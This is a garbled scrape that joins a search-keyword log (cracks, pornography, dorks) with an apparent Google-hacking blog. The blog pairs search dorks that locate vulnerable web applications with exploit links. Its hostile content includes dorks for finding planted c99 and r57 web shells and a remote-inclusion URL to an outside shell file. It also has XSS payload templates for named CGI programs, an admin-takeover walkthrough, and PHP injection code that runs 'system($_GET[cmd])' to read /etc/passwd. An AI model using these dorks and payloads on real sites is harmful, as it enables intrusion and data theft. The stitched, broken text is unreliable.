lounge 1 0.00% instructional pictures on cunningulus 1 0.00% instructions hotwheels beat that 1 0.00% instructions on replacing front wheel bearings in 1999 jeep che 1 0.00% instructivo ava mp4 player 1 0.00% instructivo de handycafe 1 0.00% instructivo de vdownloader 0.61 1 0.00% instruções do geto manager plus 1 0.00% intal software for motorola rokr e6 1 0.00% intalação do mobile phone tools 1 0.00% intel ham plus v 90 winxp descargar download free gratis 1 0.00% inter super universal mu-2 guide 1 0.00% inter super unıversal mu-1 1 0.00% interactive sex with jenna haze [xxx] dvd [xvid].zip 1 0.00% interactive sex with jenna haze [xxx] dvd [xvid].zip password 1 0.00% interactive voice call master 2.10 s60v3 دانلود 1 0.00% interenet explorer6.0 completo 1 0.00% interfas español sexi beach 3 parche 1 0.00% interior air quality 1 0.00% interior design with 3d max bed room rapidshare.com 1 0.00% internal combustion engin- 1 0.00% internal error #2keygen 3ds max 1 0.00% international dt466e 1996 electrical diagram 1 0.00% international gold brokers e-mail address @yahoo.com@hotmail.co 1 0.00% international guestbook of captains in canada @yahoo.comhotmail 1 0.00% interner explorer downlode 1 0.00% internet cafe 5.6.5 crack 1 0.00% internet connection counter 7 crack 1 0.00% internet connection counter v.7.1 eng crack 1 0.00% internet connection counter v7.1 crack 1 0.00% internet dawlond manger 1 0.00% internet dowload manager 5.03 dowload 1 0.00% internet dowload manager crark 1 0.00% internet download accelerator 5.6 %2b serial 1 0.00% internet download accelerator 5.6 crack 1 0.00% internet download manager 5.12.7 descarga del serial 1 0.00% internet download manager 5.12.7 serial keygen 1 0.00% internet download manager v.5.1.2 кряк 1 0.00% internet explorer6.1 descarga 1 0.00% internet explorer7.2 türkçe yama 1 0.00% internet scene assembler pro : cracks 1 0.00% internet turbo letöltése 1 0.00% intervideo winproducer failed to create empty document 1 0.00% intervídeo dvdcopy2 gold download gratis 1 0.00% intext:hack tools portable http://rapidshare.com/files/ 1 0.00% intext:rf online bugs 1 0.00% intile index of book mb 1 0.00% intile:index ofnero 1 0.00% intile:index.doc videos de sexo gratis html- html- php 1 0.00% intile:index.of mpg sexo con brasileñas 1 0.00% intile:index.ofkey kaspersky 7.0 1 0.00% intile:index.ofmp3 nat king cole 1 0.00% intile:index.ofmp3 nat king cool 1 0.00% intile:liveapplet.inurl 1 0.00% intile;live view / - axis 1 0.00% intimo sexy.cn 1 0.00% intitle guestbook advanced guestbook 2.2 powered 1 0.00% intitle index of boris fx exe 1 0.00% intitle index of lexpov videos downloads 1 0.00% intitle index.of sex - feet 1 0.00% intitle liveapplet inurl lv appl 1 0.00% intitle of index national treasure . mp4 1 0.00% intitle of index national treasure .mp4 1 0.00% intitle: (recharge|free balance|decode) mobile hacking or sim c 1 0.00% intitle: ``liveview carnaval 2008´´ 1 0.00% intitle: guestbook advanced guestbook 2.2 powered 1 0.00% intitle: hack hotmail account 1 0.00% intitle: hotmail hack 1 0.00% intitle: index of (jar) 128 160 1 0.00% intitle: index of jewel.swf 1 0.00% intitle: index of julia bond video 1 0.00% intitle: index of real player/password 1 0.00% intitle: index of zerogamers 1 0.00% intitle: index transmit 3.6.4 1 0.00% intitle: index.of ca anti-virus 1 0.00% intitle: index.of user adm 1 0.00% intitle: kidsex 1 0.00% intitle: resume sap project manager (az or arizona) -jobs -appl 1 0.00% intitle: usage statistics for car crashes 1 0.00% intitle:usage statistics for intext:total unique usernames 1 0.00% intitle;index.ofsis divx player 1 0.00% intitle;index:off block breaker deluxe 2007 .jar 1 0.00% introduction 1 0.00% introduction to algorithms solutions rapidshare 1 0.00% introduction to mathcad rapidshare.com/files|megaupload.com/d|b 1 0.00% introduction to mathematical statistics hogg rapidshare.com 1 0.00% introduction to mathematical statistics hogg torrent 1 0.00% introduction to md5 hashes 1 0.00% inurl 1 0.00% inurl :'tseekdir.cgi' 1 0.00% inurl: /missions/realistic/14 1 0.00% inurl: boa login 1 0.00% inurl: ccbill.log inbedwithfaith 1 0.00% inurl: hackedpro.org/forum/ 1 0.00% inurl: password xls 1 0.00% inurl: “powered by php-nuke” 1 0.00% inurl:*.php !c99shell v. 1.0 pre-release build #16! 1 0.00% inurl:.uk -intext:blog powered buy wordpress 2.1.2 1 0.00% inurl:c99.php 1 0.00% inurl:c99.php c99shell 1 0.00% inurl:file_managerinfo=admin 1 0.00% inurl:http://rapidshare sql compare redgate 1 0.00% inurl:stats/ intitle:usage statistics intext:0.00% wwww. 1 0.00% inurl:stats/ intitle:usage statistics intext:gmt 1 0.00% inurl:windows live password stealer:rapidshare.de 1 0.00% invadindo a megajogos e roubando senhas 1 0.00% invadindo o codigo fonte thecrims 1 0.00% invalid serial number delphi2007 1 0.00% investment japan in malaysia-statistic 1 0.00% investors dream 1.7 скачать 1 0.00% invision 2.7 1 0.00% invision power file manager lenguaje español 1 0.00% invisionfree stop brute force 1 0.00% inzest forum blog depositfiles.com 1 0.00% io tube instalar o crack the simpsons hit e rum 1 0.00% ip port cunter strike 1 0.00% ip4200 o carro nao se move 1 0.00% iphone 4.0.13 unlock 3.9 bootloader 1 0.00% iphone monsterpack for k1 nasıl yüklenio 1 0.00% iphone official 1.1.3 upgrade 1.3.3-3 1 0.00% iphone ringtone maker v.1.3.1 1 0.00% iphone theme.thm indir 1 0.00% iphone-ringtone-maker-2.0.1 serial 1 0.00% iphone-ringtone-maker-2.0.1 serial.rar 1 0.00% ipix dc305 driver 1 0.00% ipix dc305 matrix drivers 1 0.00% ipix interactive studio rapidshare.com/files|megaupload.com/d|b 1 0.00% ipix panoramic intext:rapidshare.com/files 1 0.00% ipod 3rd generation version1.1 download 1 0.00% ipod access serial number 4.1.3 1 0.00% ipod act v9.0.50 1 0.00% ipod fcce 1 0.00% ipod touch usa ebbudy 1 0.00% ipodrip letöltés 1 0.00% iq power russia 1 0.00% iq-train basic and descarga 1 0.00% iq-train basic crack 1 0.00% ir photo nude 1 0.00% iran profisional armi 1 0.00% iran www.emirate air line 1 0.00% irani vomen image.com 1 0.00% iranlı srx 1 0.00% iransexyfoot 1 0.00% iraq@yahoo.com 1 0.00% irda remotecontrol ii 2.06 torrent 1 0.00% irda usb drivers qc pass ws %d0%b1%d0%b5%d1%81%d0%bf%d0%bb%d0%b 1 0.00% iring email contact 2008 hotmail.de @juno.com - @yahoo.de 1 0.00% irish automotive automobile car industry consumer 1 0.00% iron factries in malaysia 1 0.00% irremote 1.43 ticket 1 0.00% irremote s60 3rd keygen 1 0.00% irremote version 1.0.3 licença 1 0.00% irshell code transcontinent 1 0.00% is compaq presario f558 bluetooth enabled 1 0.00% is there a time difference in to hexstring conversion ver- 1 0.00% isa server 2004 full download zshare.net 1 0.00% isa server 2004 full iso 1 0.00% isa server 2006 standart 1 0.00% isa server 2006 standart edition 1 0.00% isa server 2006 standart edition full cracked iso 2 1 0.00% isa2000 kurulum rar 1 0.00% ishotmyself karina 1 0.00% isi-loader con los items de braken 1 0.00% isi-loader v2.6 1 0.00% isilo 4.37 s/n 1 0.00% isilo 5.01 crack şifre 1 0.00% isilo 5.01 mihd 1 0.00% isilo para symbian craqueado 1 0.00% isilo v 5.01 نرم افزار 1 0.00% isilox 4.37 serial number 1 0.00% islam onlaine.com 1 0.00% islam wep.net 1 0.00% islamiyet çok güzel.ick.net 1 0.00% island defense 2.8.3 download 1 0.00% isle of capri ez cash casino 1 0.00% iso 16232 lab 1 0.00% iso acura honda navteq 4.62 1 0.00% isp shift out picbasicpro isd 1 0.00% israel @yahoo.com.il @yahoo.il @hotmail.it 2008 txt 1 0.00% israel car industry 1 0.00% israel coatings magazine 1 0.00% israel-arab-sex 1 0.00% israeli car industry: business is good! 1 0.00% israelsex 1 0.00% istalacao de pantalla internet explorer 1 0.00% istalar maple story gratis 1 0.00% istalaÇao de programa de v3 1 0.00% istalação da webcam x5tech 1 0.00% istalação do drive do webcam creative 1 0.00% isuzu 1 0.00% isuzu diesel usage trucks specifications malaysia 1 0.00% isuzu elf manual rapidshare 1 0.00% it dictionary saftwar 1 0.00% it. omsn art phone.com 1 0.00% italian supplier of new automotive spare parts 1 0.00% italy purchasing executives 1 0.00% italyan sex porn.cn 1 0.00% item duplicate monstermu 1 0.00% itouch cybertech 1 0.00% itsm 2000-v. 7.1 rapidshare.com 1 0.00% itunes 2.8.1 pirata 1 0.00% itunes 2.8.1 version pirata donde la descargo 1 0.00% itunes en aspanol 1 0.00% itunes-descargar-gratis 1 0.00% ivt for infiniti g35 1 0.00% iy yahoo.co.in 1 0.00% j-enter kiss video free 1 0.00% jab comix depositfiles.com -we met 1 0.00% jab comix torrent siterip blog 1 0.00% jabcomix omega girl 2 download 1 0.00% jabcomix şifre 1 0.00% jack@yahoo.com @hotmail.com @gmail.com @gmx.com 1 0.00% jaclyn case barefootmaniac hd 1 0.00% jacob's direct3d 8.1.6 1 0.00% jade feng intext:rapidshare.com/files 1 0.00% jaguar aftermarket manufacturers china 1 0.00% jaguar plastics company in brazil 1 0.00% jaguar x-type ecu pinout 1 0.00% jaguar x-type fuse diagram 1 0.00% jam xm licença 1 0.00% james and the giant peach soundtrack badongo 1 0.00% james@yahoo.com.hotmail 1 0.00% jamie 2007 email yahoo.ca yahoo.com.my yahoo.com.br att.net 1 0.00% jamie wilczek 1 0.00% janwal caravan service 1 0.00% jap valid coupon code 1 0.00% japan film seks free download.com/ 1 0.00% japan korea malaysia singapore@yahoo.com@hotmail.com 2008 1 0.00% japan-partners.com 1 0.00% japan-sexe.com 1 0.00% japanese cartoon.com.jp 1 0.00% japanese sex u-tube 1 0.00% japanese-girl-school 1 0.00% japanese-whores.com 1 0.00% japanesse whore 1 0.00% japangril 1 0.00% japon panda movis 1 0.00% japon tranny.com 1 0.00% jar realplayer motorokr e6 1 0.00% jasmin cam.com.tr 1 0.00% jasmin geisel 1 0.00% jasmin live-1.com 1 0.00% jasmine live-1.com 1 0.00% jasminecom.blogspot 1 0.00% jatropha in pakistan 1 0.00% jatropha magazine 1 0.00% java 2 runtime environment standard edition v1.3.1_19 1 0.00% java application installer for win xp to samsung z400 1 0.00% java auto generate password algorithm example 1 0.00% java big number implementation 1 0.00% java check username and password with salt 1 0.00% java jar jad snowbros oyunu 1 0.00% java md-5 encryption 1 0.00% java md5 crypt 1 0.00% java md5 hash functions 1 0.00% java md5 hash of string 1 0.00% java md5 hashing hex 1 0.00% java md5 passphrase hash 1 0.00% java md5 vs php md5 1 0.00% java midp 2.0 compatibilitate cu apple itunes downald 1 0.00% java mortal combat ultima 1 0.00% java one way encryption 1 0.00% java plug-in 1.5 freedownload 1 0.00% java program of vigenere cipher 1 0.00% java ring tone editor.jar for w800i 1 0.00% java runtime environment 1.5 baixaki 1 0.00% java runtime update 5.11download 1 0.00% java sha algorightms 1 0.00% java source code sha algorithm 1 0.00% java symmetric key sha.java 1 0.00% java uploader download uploader.exe 1 0.00% java uploader letöltés 1 0.00% java uploader rapidshare.de 1 0.00% java uploader v1.1 free 1 0.00% java version 1.5.0 _07 dawnloud 1 0.00% java version 1.5.0.05 gratuito 1 0.00% java zeny generator ragnarok 2008 1 0.00% java(tm)plug-in fatal error ne demek 1 0.00% java(tm2 runtime environmentstandard edition 1.4.2_03 1 0.00% java1.1.6 1 0.00% javaruntime letöltés 1 0.00% javascript and sha 1 0.00% javascript authentication 1 0.00% javascript built in encryption function 1 0.00% javascript calculate hash function 1 0.00% javascript challenge response authentication 1 0.00% javascript change password in md5 1 0.00% javascript code cryptor 1 0.00% javascript code for a login page 1 0.00% javascript code for md5 encryption 1 0.00% javascript con md5 1 0.00% javascript concatenate 1 0.00% javascript create hash code 1 0.00% javascript crypt implementation 1 0.00% javascript crypt source 1 0.00% javascript digest algorithm on-line test 1 0.00% javascript encrypting algorithms 1 0.00% javascript generate random hash string 1 0.00% javascript get hash code 1 0.00% javascript hash email address 1 0.00% javascript hash password field login 1 0.00% javascript hashing library password 1 0.00% javascript hmac challenge 1 0.00% javascript implementation download 1 0.00% javascript implementation html encoding. 1 0.00% javascript login algorithm 1 0.00% javascript make hash function 1 0.00% javascript md5 for 1 0.00% javascript md5 hash example 1 0.00% javascript md5 password generator 1 0.00% javascript md5 perl 1 0.00% javascript message digest sha 1 0.00% javascript modpow 1 0.00% javascript new md5().digest 1 0.00% javascript object hashcode 1 0.00% javascript password hash salt ============================================================================ appserv errors.php? ================================ http://www.google.com/search?q=allinurl:++db++backup-++gz++&filter=0 ============================================= “r57″) { “inurl:r57.php”); “\”[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\”"); “intitle:r57shell”); “r57″); “safe_mode”); eq “c99″) { “inurl:c99.php”); “\”Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout\”"); “intitle:\” - phpshell\”"); “intitle:\” - c99shell\”"); “c99″); “Safe-mode”); “\”Auto error traping enabled\”"); “intitle:\”MyShell 1.1.0 build 20010923\”"); “MyShell”); “Echo commands”); eq “phs”) { “intitle:\”PHP Shell 1.5\”"); “intitle:\”PHP Shell 1.6\”"); “intitle:\”PHP Shell 1.7\”"); “PHP Shell”); push(@checkTerm, “Choose new working”); } elsif(lc($ARGV[0]) eq “phm”) { push(@searchTerm, “\”PHPShell by Macker\”"); push(@searchTerm, “\”[ Main Menu ] [ PHPKonsole ] [ Haxplorer ]\”"); push(@checkTerm, “Haxplorer”); push(@checkTerm, “PHPKonsole”); } elsif(lc($ARGV[0]) eq “rem”) { push(@searchTerm, “intitle:\”phpRemoteView: \”"); push(@searchTerm, “\”REMVIEW TOOLS\”"); push(@checkTerm, “phpRemoteView”); push(@checkTerm, “perms”); } ========================================================= مهمه safe-mode: off (inurl:c99.php)&hl=en&ct=clnk&cd=69&gl=sa&lr=lang_ en + K20/r57.php + [DOCUMENT_ROOT]=http://h4cks.t35.com/ek.txt? ======================================== Top Clicks google.com/search?q=inurl… wordpress.com/tag/files-c… google.com/search?hl=it… google.com/search?num=100… google.com/search?q=%22po… google.com/search?hl=en… google.com/search?num=100… google.com/search?hl=en… google.com/search?hl=en… google.com/search?hl=it… Top Posts "index of/" "ws_ftp.ini" "parent directory" allinurl: admin mdb GOOGLE HACKING "login: *" "password: *" filetype:xls Active Webcam Page" inurl:8080 "your password is" filetype:log "Powered by Invision Power Board(U) v1.3 Final" "robots.txt" "Disallow:" filetype:txt auth_user_file.txt "sets mode: +k" “powered by ubbthreads” “powered by active php bookmarks” | inurl:bookmarks/view_group.php?id= “powered by phplist” | inurl:”lists/?p=subscribe” | inurl:”lists/index.php?p=subscribe” -ubbi -bugs +phplist -tincan.co.uk inurl:*.exe ext:exe inurl:/*cgi*/ intitle:admbook intitle:version filetype:php intext:”LinPHA Version” intext:”Have fun” “index of” intext:fckeditor inurl:fckeditor inurl:install.pl intitle:GTchat intext:”PhpGedView Version” intext:”final - index” -inurl:demo intext:”Powered by CubeCart 3.0.6″ intitle:”Powered by CubeCart” “Site powered By Limbo CMS” intext:”Powered by SimpleBBS v1.1″* “Powered By phpCOIN 1.2.2″ “2005 SugarCRM Inc. All Rights Reserved” “Powered By SugarCRM” “Based on DoceboLMS 2.0″ Recent Comments 602 on intitle:”Welcome to 602L… modyhunter on filetype:asp inurl:… cash until payday lo… on “Fatal error: Call to un… google hacks on “Copyright 2004 © Digit… ========================================================= “powered by ubbthreads” forums powered by ubbthreads are vulnerable to file inclusion. You can get more results with yahoo search. http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt? http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded =========================================================================== Google Search: “powered by ubbthreads” Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “powered by active php bookmarks” | inurl:bookmarks/view_group.php?id= Posted by cyberdevil on March 8, 2008 Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code. exploit (i haven’t tested it) http://www.securityfocus.com/archive/1/305392 my version of exploit http://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps Google Search: “powered by active php bookmarks” | inurl:bookmarks/view_group.php?id= Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “powered by phplist” | inurl:”lists/?p=subscribe” | inurl:”lists/index.php?p=subscribe” -ubbi -bugs +phplist -tincan.co.uk Posted by cyberdevil on March 8, 2008 this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me: advisory/poc exploit: http://retrogod.altervista.org/phplist_2102_incl_xpl.html Google Search: “powered by phplist” | inurl:”lists/?p=subscribe” | inurl:”lists/index.php?p=subscribe” -ubbi -bugs +phplist -tincan.co.uk Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » inurl:*.exe ext:exe inurl:/*cgi*/ Posted by cyberdevil on March 8, 2008 a cgi-bin executables xss/html injection miscellanea: some examples: inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=”>[XSS HERE] inurl:wa.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/wa.exe?SUBED1=”>[XSS HERE] inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=”>[XSS HERE]&poi1city=city&poi1state=OK inurl:as_web.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes inurl:webplus.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webplus.exe?script=”>[XSS HERE] inurl:odb-get.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=”>[XSS HERE]&WIT_oid=what::what::1111&m=1&d= inurl:hcapstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/hcapstat.exe?CID=”>[XSS HERE]&GID=&START=110&SBN=OFF&ACTION=Submit inurl:webstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=”>[XSS HERE] inurl:cows.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=”>[XSS HERE] inurl:findifile.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=”>[XSS HERE]&LIMIT=50&YEAR=”> inurl:baserun.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=”>[XSS HERE] inurl:Users.exe ext:exe inurl:/*cgi*/ html injection: http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html][XSS HERE]&page=1 inurl:webstat.exe ext:exe inurl:/*cgi*/ http://[target]/[path]/webstat.exe?A=X&RA=[XSS HERE] Google Search: inurl:*.exe ext:exe inurl:/*cgi*/ Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » intitle:admbook intitle:version filetype:php Posted by cyberdevil on March 8, 2008 intitle:admbook intitle:version filetype:php tested version: 1.2.2, you can inject php code in config-data.php and execute commands on target through X-FOWARDED FOR http header when you post a message also you can see phpinfo(): http://[target]/[path]/admin/info.php perl exploit: http://retrogod.altervista.org/admbook_122_xpl.html Google Search: intitle:admbook intitle:version filetype:php Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » intext:”LinPHA Version” intext:”Have fun” Posted by cyberdevil on March 8, 2008 this is for Linpha <=1.0 arbitrary local inclusion: http://retrogod.altervista.org/linpha_10_local.html intext:”LinPHA Version” intext:”Have fun” to see version in description in Linpha 0.9 branch there is sql injection through cookies also to bypass admin login, search for exploit Google Search: intext:”LinPHA Version” intext:”Have fun” Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “index of” intext:fckeditor inurl:fckeditor Posted by cyberdevil on March 8, 2008 “index of” intext:fckeditor inurl:fckeditor this dork is for FCKEditor script through editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious contempt on target machine including php code and launch commands… however if you do not succeed to execute the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them… this tool make the dirty work for 2.0 - 2.2 versions: http://retrogod.altervista.org/fckeditor_22_xpl.html Google Search: “index of” intext:fckeditor inurl:fckeditor Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » inurl:install.pl intitle:GTchat Posted by cyberdevil on March 8, 2008 Gtchat install file. You can disable the chat program or change the language without a admin username or password. You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom. Google Search: inurl:install.pl intitle:GTchat Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » intext:”PhpGedView Version” intext:”final - index” -inurl:demo Posted by cyberdevil on March 8, 2008 PHPGedView <=3.3.7 remote code execution advisory & poc exploit: http://rgod.altervista.org/phpgedview_337_xpl.html Google Search: intext:”PhpGedView Version” intext:”final - index” -inurl:demo Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » intext:”Powered by CubeCart 3.0.6″ intitle:”Powered by CubeCart” Posted by cyberdevil on March 8, 2008 CubeCart is an eCommerce script written with PHP & MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398 Moderator note: “Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke” Google Search: intext:”Powered by CubeCart 3.0.6″ intitle:”Powered by CubeCart” Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “Site powered By Limbo CMS” Posted by cyberdevil on March 8, 2008 this is the dork for Limbo Cms <= 1.0.4.2 _SERVER[] overwrite / remote code execution advisory & poc exploit: http://rgod.altervista.org/limbo1042_xpl.html Google Search: “Site powered By Limbo CMS” Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » intext:”Powered by SimpleBBS v1.1″* Posted by cyberdevil on March 8, 2008 Vulnerability Description SimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided. Solution Description Currently, there are no known upgrades, patches, or workarounds available to correct this issue. Products: * SimpleMedia SimpleBBS 1.1 Affected Vulnerability classification: * Remote vulnerability * Input manipulation attack * Impact on integrity * Exploit unavailable * Verified More info on Vuln: http://www.securityfocus.com/bid/15594 Google Search: intext:”Powered by SimpleBBS v1.1″* Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “Powered By phpCOIN 1.2.2″ Posted by cyberdevil on March 8, 2008 PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosure advisory: http://rgod.altervista.org/phpcoin122.html more generic: “Powered By phpCOIN” to see previous verions (not tested) Google Search: “Powered By phpCOIN 1.2.2″ Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “2005 SugarCRM Inc. All Rights Reserved” “Powered By SugarCRM” Posted by cyberdevil on March 8, 2008 this is the dork for Sugar Suite 3.5.2a & 4.0beta remote code execution issue, advisory & poc exploit: http://rgod.altervista.org/sugar_suite_40beta.html Google Search: “2005 SugarCRM Inc. All Rights Reserved” “Powered By SugarCRM” Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “Based on DoceboLMS 2.0″ Posted by cyberdevil on March 8, 2008 advisory & poc exploit: http://rgod.altervista.org/docebo204_xpl.html Google Search: “Based on DoceboLMS 2.0″ Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “This website powered by PHPX” -demo Posted by cyberdevil on March 8, 2008 This is the dork for PhpX <= 3.5.9 Sql injection /login bypass vulnerability advisory & poc exploit: http://rgod.altervista.org/phpx_359_xpl.html Google Search: “This website powered by PHPX” -demo Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “Powered by Xaraya” “Copyright 2005″ Posted by cyberdevil on March 8, 2008 Xaraya <=1.0.0 RC4 Denial of Service explaination: http://rgod.altervista.org/xarayaDOS.html exploit: http://rgod.altervista.org/xarayaDOS_xpl.html Google Search: “Powered by Xaraya” “Copyright 2005″ Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “powered by GuppY v4″|”Site créé avec GuppY v4″ Posted by cyberdevil on March 8, 2008 Guppy <= 4.5.9 $REMOTE_ADDR overwrite -> remote code execution / various arbitrary inclusion issues advisory & poc exploit: http://rgod.altervista.org/guppy459_xpl.html Google Search: “powered by GuppY v4″|”Site créé avec GuppY v4″ Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “Powered by UPB” (b 1.0)|(1.0 final)|(Public Beta 1.0b) Posted by cyberdevil on March 8, 2008 dork: “Powered by UPB” (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can’t find it in GHDB and I am surprised of how it still works… register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and… boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board”; error_reporting(0); ini_set(”max_execution_time”,0); system($_GET[cmd]); echo ” now in config.dat we have: … $title=”Ultimate PHP Board “; error_reporting(0); ini_set(”max_execution_time”,0); system($_GET[cmd]); echo ” “; … in header.php we have: … include “./db/config.dat”; … so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd Google Search: “Powered by UPB” (b 1.0)|(1.0 final)|(Public Beta 1.0b) Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » “Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved” “Mambo is Free Software released” Posted by cyberdevil on March 8, 2008 This dork is for Mambo 4.5.2x Globals overwrite / remote command execution exploit: http://rgod.altervista.org/mambo452_xpl.html Google Search: “Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved” “Mambo is Free Software released” Posted in Advisories and Vulnerabilities | Tagged: blog, Google, google hackers, google hacking, google hacking tips, Google Hacking Tricks, hackers, Hacking, hacking news, internet, technology | No Comments » ============================================================================ Listados de urls autorizadas para el sitemap هذا الدورك مهم ====================================== ./resultados.php ./upload/upload.php ./upload/test/php_1.php3 ./upload/test/php.php3 ./upload/class.upload.php ./upload/index.html ./libros_recomendados.php ./curiosidades.php ./850/index.php ./index.php ./tests/thumbnail.php ./tests/test/test.html ./tests/test/imgsupport.php ./tests/test/egy_spider.php ./tests/test/show_image_in_imgtag.php ./tests/libros_recomendados.php ./tests/recetas.inc.php ./tests/ver_receta.inc.php ./tests/ver_receta.php ./tests/test2/class.Thumbnail.php ./tests/test2/sample/sample3.php ./tests/test2/sample/sample4.php ./tests/test2/sample/sample1.php ./tests/test2/sample/sample2.php ./tests/test2/sample/sample.html ./tests/test2/sample/save1.php ./tests/libros2.php ./tests/libros.php ./historias.php ./marcas.php ./chocolate_online.php ./administracion/enviar_enlace.php ./administracion/enviar_glosario.php ./administracion/telfprov_enviado.php ./administracion/enviar_receta.php ./administracion/class.upload.php ./administracion/FCKeditor/_samples/sampleslist.html ./administracion/FCKeditor/_samples/_plugins/findreplace/replace.html ./administracion/FCKeditor/_samples/_plugins/findreplace/find.html ./administracion/FCKeditor/_samples/default.html ./administracion/FCKeditor/_samples/php/sample04.php ./administracion/FCKeditor/_samples/php/sample03.php ./administracion/FCKeditor/_samples/php/sample01.php ./administracion/FCKeditor/_samples/php/sample02.php ./administracion/FCKeditor/_samples/php/sampleposteddata.php ./administracion/FCKeditor/fckeditor.php ./administracion/FCKeditor/_whatsnew.html ./administracion/FCKeditor/editor/fckdebug.html ./administracion/FCKeditor/editor/lang/_getfontformat.html ./administracion/FCKeditor/editor/fckeditor.original.html ./administracion/FCKeditor/editor/filemanager/upload/test.html 